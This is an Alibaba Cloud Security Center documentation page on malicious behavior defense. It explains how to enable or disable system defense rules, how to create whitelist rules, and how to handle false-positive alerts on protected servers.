Malicious behavior defense - Security Center - Alibaba Cloud Documentation Center

Malicious behavior defense is a network security mechanism aimed at identifying, blocking, and responding to various forms of malicious activities. This topic introduces how to effectively use malicious behavior defense to protect your servers from attacks and threats.

Scenarios

Malicious behavior defense supports system defense rules and custom defense rules. The following table describes the scenarios for which the two types of rules are suitable:

Important

Custom defense rules are assigned a higher priority than system defense rules.

Rule Type	Scenarios
System defense rule	Defense against common attacks Common attacks are automatically blocked. You can disable a system defense rule or change the servers to which a system defense rule is applied to minimize false alerts. False alert handling If you handle an alert event whose alert type is Precise defense and you determine that the processes detected and reported by Security Center based on a system defense rule are normal and are required for your workloads, you can disable the rule on the System Defense Rule tab of the Malicious Behavior Defense tab. You can also remove the affected servers from the list of servers on which the rule takes effect.
Custom defense rule	If you want to allow or block specific behavior, you can use the Custom Defense Rule to create custom defense rules based on your business scenarios. For more information about the examples of custom defense rules, see Best practices for configuring custom defense rules by using the malicious behavior defense feature.

Manage system defense rules

Security Center automatically enables all system defense rules in the Advanced, Enterprise, and Ultimate editions.

Log on to the Security Center console. In the top navigation bar, select the region of the asset that you want to manage. The following regions are supported: China and Outside China.
In the left-side navigation pane, choose Protection Configuration > Host Protection > Host-specific Rule Management.
On the System Defense Rule tab of the Malicious Behavior Defense tab, find and manage a system defense rule.
Search for a system defense rule
- On the System Defense Rule tab, enter the name of the system defense rule in the search box.
- On the System Defense Rule tab, select a value in the ATT&CK Phase section to filter rules.
Manage a system defense rule
- Enable or disable a system defense rule
  If a system defense rule is not suitable for your business scenario and affects the security score of your assets, you can disable the rule.
  Important
  After you disable a system defense rule, Security Center no longer detects or reports risks based on the rule. The alert events that are generated based on the rule are no longer displayed on the Alerts page. Proceed with caution.
  1. Select one or more system defense rules.
  2. In the lower-left corner of the rule list, click Enable or Disable.
- Manage servers to which a system defense rule is applied
  Important
  After you remove a server from a system defense rule, Security Center no longer detects or reports risks on the server based on the rule. Proceed with caution.
  1. Find the system defense rule that you want to manage and click Manage Host in the Actions column.
  2. In the Host Management panel, add servers to the rule or remove servers from the rule. Then, click OK.

Manage custom defense rules

If Security Center generates alerts for your normal service requests, you can create a custom defense rule to add specific behavior to the whitelist. For example, you can add behavior of the Command line and process hash types to the whitelist.

Log on to the Security Center console. In the upper-left corner of the console, select the region where the assets to be protected are located: China or Outside China.
In the left-side navigation pane, select Protection Configuration > Host Protection > Host-specific Rule Management.
On the Custom Defense Rule tab of the Malicious Behavior Defense tab, click Create Whitelist Rule.
In the Create Whitelist Rule panel, configure the Rule Type parameter, the required parameters, and the Action parameter based on your business requirements. Then, click Next.
The required parameters vary based on the value of the Rule Type parameter. If you want to add specific behavior to the whitelist, make sure that the Rule type parameter for the defense rule uses one of the following values:
- Process hash
- Command line
- Process Network
- File Read and Write
- Operation on Registry
- Dynamic-link Library Loading
- File Renaming
For more information, see Best practices for configuring custom defense rules by using the malicious behavior defense feature.
Note
You can add only behavior of the Process hash type to the blacklist.
In the server list in the Create Whitelist Rule panel, select the servers on which you want the rule to take effect and click Complete.
By default, a new custom defense rule is enabled. You can manage the servers on which the rule takes effect.

View and handle alert events

After you configure a malicious behavior defense rule, Security Center automatically blocks malicious behavior that hits the rule and generates alerts based on the rule. To view and handle alert events, perform the following operations:

Log on to the Security Center console. In the top navigation bar, select the region of the asset that you want to manage. The following regions are supported: China and Outside China.
In the left-side navigation pane, select CTDR > Alert.
On the Alert page, select the Cloud Workload Protection Platform (CWPP) tab, and click the number below Precise Defense.
In the list of alert events, view the alert events that are generated for automatically blocked risks. If an alert event is a false positive, click Details in the Actions column to handle the alert event.
In this example, the alert event that is generated for the alert named Suspicious worm script behavior is handled.
In the alert details panel, obtain and record the following information for subsequent use.
- The name of the system defense rule based on which risks are detected. The alert event is generated for the detected risks. In this example, the name of the system defense rule is Malicious Damage To Client Processes.
- The value of ATT&CK Phase for the alert event. In this example, the value is Impact and Damage.
- The names and IP addresses of the servers that are affected by the alert event.
In the left-side navigation pane, select Protection Configuration > Host Protection > Host-specific Rule Management.
On the Host defense rules tab, search for the system defense rule based on which the alert event is generated.
- You can enter Suspicious worm script behavior in the search box.
- You can also click Damage in the ATT&CK Phase section of the Host defense rules tab.
Manage the Suspicious worm script behavior system defense rule.
- If the system defense rule is not suitable for your business scenario and you no longer want Security Center to generate alert events based on the system defense rule, you can click the icon in the Switch column to disable the rule.
  Important
  After you disable a system defense rule, Security Center no longer detects risks or generates alert events based on the rule. The alert events that are generated based on the rule are no longer displayed on the Alerts page. Proceed with caution.
- If you want to handle an alert event that is a false positive, you can click Actions in the Manage Host column and remove the servers that are affected from the server list of the rule.
  You can also find and handle the false positive alert event on the Alerts page. For more information, see View and handle alert events.
  Important
  If you want the system defense rule to continue protecting your server, you can add the server to the server list on the Malicious Behavior Defense tab after you handle the alert event.